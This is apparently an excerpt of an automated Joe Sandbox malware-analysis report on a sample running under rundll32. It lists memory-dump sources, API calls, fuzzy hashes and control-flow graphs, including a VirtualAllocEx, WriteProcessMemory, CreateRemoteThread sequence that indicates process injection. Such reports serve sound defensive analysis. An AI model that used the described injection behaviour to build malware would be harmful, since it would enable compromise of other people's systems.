• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConvertFreeLocalString
                                                                                                                                                                                                                                                  • String ID: Invalid SID
                                                                                                                                                                                                                                                  • API String ID: 3201929900-130637731
                                                                                                                                                                                                                                                  • Opcode ID: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                                                                                                  • Instruction ID: f9de7a073d5be384f166f447d1e8f3002abe3b47d4f42f60c35e88cddef5f632
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED21C070A047199BDB14DF68C815BAFBBF8FF44B24F10451EE405A7380D7B9AA049BD1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3909B
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F390FE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                                  • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                                  • Opcode ID: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                                                                                                  • Instruction ID: 39be322fdf4d2a96a7d4467f1ee3a306f89ca62395949371f4395ae0dd7f21ce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1321C370805784DED721CF68C90478BBFF4EF15710F10869ED49597781D7B9A604D7A1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 2427045233-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                                                                                                  • Instruction ID: 0d093a449356a8607a440341b52527694960ecc4940a971a6568a5795e2e671e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E311D3B1D40B80AFC724EFB4D841B8ABBF4AF05310F04C51AE592DB241EB74E608EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00F34261,00F74400,000000FF,80A20388,00000000,?,00000000,?,?,?,00F74400,000000FF,?,00F33A75,?), ref: 00F34096
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,40000022,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocFree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2012307162-0
                                                                                                                                                                                                                                                  • Opcode ID: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                                                                                                  • Instruction ID: be474dc0c234308dd2e1be3567ee9f8499df09279fdee96d84a1dc7adb201af1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F519DB1A006059FDB18DF68C985AAEBBB5FB48360F14462DE929E7380D734FD44DB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00F31E01
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00F31E21
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00F31EA7
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000001,80A20388,00000000,00000000,00F73C40,000000FF,?,00000000), ref: 00F31F2D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocFree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2012307162-0
                                                                                                                                                                                                                                                  • Opcode ID: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                                                                                                  • Instruction ID: 951de30956ca153643b851778e3459de1d7b758b036e31c76f4b8adfd608b9ff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251E172A082159FC715EF28DC40A6ABBE8FB49370F110A2EF916D7290DB71E9449791

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:0.7%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:88.3%
                                                                                                                                                                                                                                                  Signature Coverage:7.8%
                                                                                                                                                                                                                                                  Total number of Nodes:77
                                                                                                                                                                                                                                                  Total number of Limit Nodes:16

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: $=$.$3$MC1t$^qE?$bIfh$e$eBOO$ioAU$k$l$nEhx$r$sYP
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1846638993
                                                                                                                                                                                                                                                  • Opcode ID: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                                                  • Instruction ID: 0aba12783aff90d63c6f286ccc0a077e7894613a05cce7ad61c0a4bd09775adc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CD1103270168887EB55CF25E4147AD7BA1F749BC8F488025FE8D5BB85EE39DA49C700

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 150 273f41380-273f413cc Sleep VirtualAllocEx 151 273f41456-273f41466 150->151 152 273f413d2-273f41400 WriteProcessMemory 150->152 153 273f41402-273f4143a CreateRemoteThread 152->153 154 273f41453 152->154 153->151 155 273f4143c-273f4143e 153->155 154->151 156 273f4144e-273f41451 155->156 157 273f41440-273f41448 WaitForSingleObject 155->157 156->151 157->156
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
• Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 3172812169-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                                                  • Instruction ID: 70ca693b3c1452cbeb4233b6b91bedeb956dc212f3bce1284f7759b325db5040
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F117F22709E9042F6A0CF26BC08B5666A0B789FF4F644324EFBD17BE5DB38C6059605
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1812402828.00007DF457370000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF457370000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_7df457370000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 3332741929-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                  • Instruction ID: 4c80bb681854a8c452d6bfbb700bfb3c2136b7447f6a1c8e11a05156639b6d57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C771AF3161894C8FEB94EF5CD898BAD77E1FB98325F104626E81EC73A0DB749954CB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                                                  • Instruction ID: de4ea5b9e3f9a8077fbccb1ae49e52064009d4859817f5b38532e9b6eab09e3a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC11F970618B888FD6B0DF4998857AAB7E1FBD8721F54462FE48CD3210C7319841CB93
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                  • Instruction ID: 70a669bdce0360af5a4ed8ddf26b6109b9037591421ca1e87005283ddf5732a6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF0F470618B048BE344DF1884C927677E1FBD8715F24452EE889C7361CB329842CB43
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                                                  • Instruction ID: 8f0d3b2c53fd494b03f61fdc13c2ffc96a1c15cac520bb87c7f0ff0648618024
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F0A470628B408BE754DF1884CA67677E1FBD8755F64852EE989C7361CB329882CB43
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                  • Instruction ID: a083f9191c706146c8e7986bab9b69e3d9d12d8c9ae8219d5554d50f0b137a16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F0B470A28F048BC704AF2C884AA7533D2FBE8B55F54462EE448D7361CB35E8428B83

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  • Opcode ID: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                  • Instruction ID: ce7cf706ff479c633d90d4e2232b4daa5dad0394c03c5228d787fd48495beb57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F10B36619B8496EB60CB55E89079EB7A0FBC8B90F505015EB8E93F68DF3AC440CF01
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$@$@$`
                                                                                                                                                                                                                                                  • API String ID: 0-307318802
                                                                                                                                                                                                                                                  • Opcode ID: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                  • Instruction ID: aa6b97b91d781027647f9919985863f54d88b8f72d0e9bb99e84c44147c3e87f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BB14D7061CB488FD764DF58D845B9AB7E0FB98710F508A1EA58DC3291EB74D944CB83
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1397195220.0000016AD27A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD27A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_16ad27a0000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                  • Instruction ID: 869f7e07c885d990cbf4146891147c7a7889a178cf4638557b72802b7afeb6d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EB1823121CA088FDB64EF5CC885B9AB7E1FF98710F50866EE489D7251DB35E845CB82

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1812402828.00007DF457370000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF457370000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_7df457370000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3280610774-0

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 203 273f414d0-273f414dc 204 273f414e0-273f414e7 SleepEx 203->204 204->204
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3472027048-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 205 16ad27511c0-16ad27511f0 VirtualAlloc
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
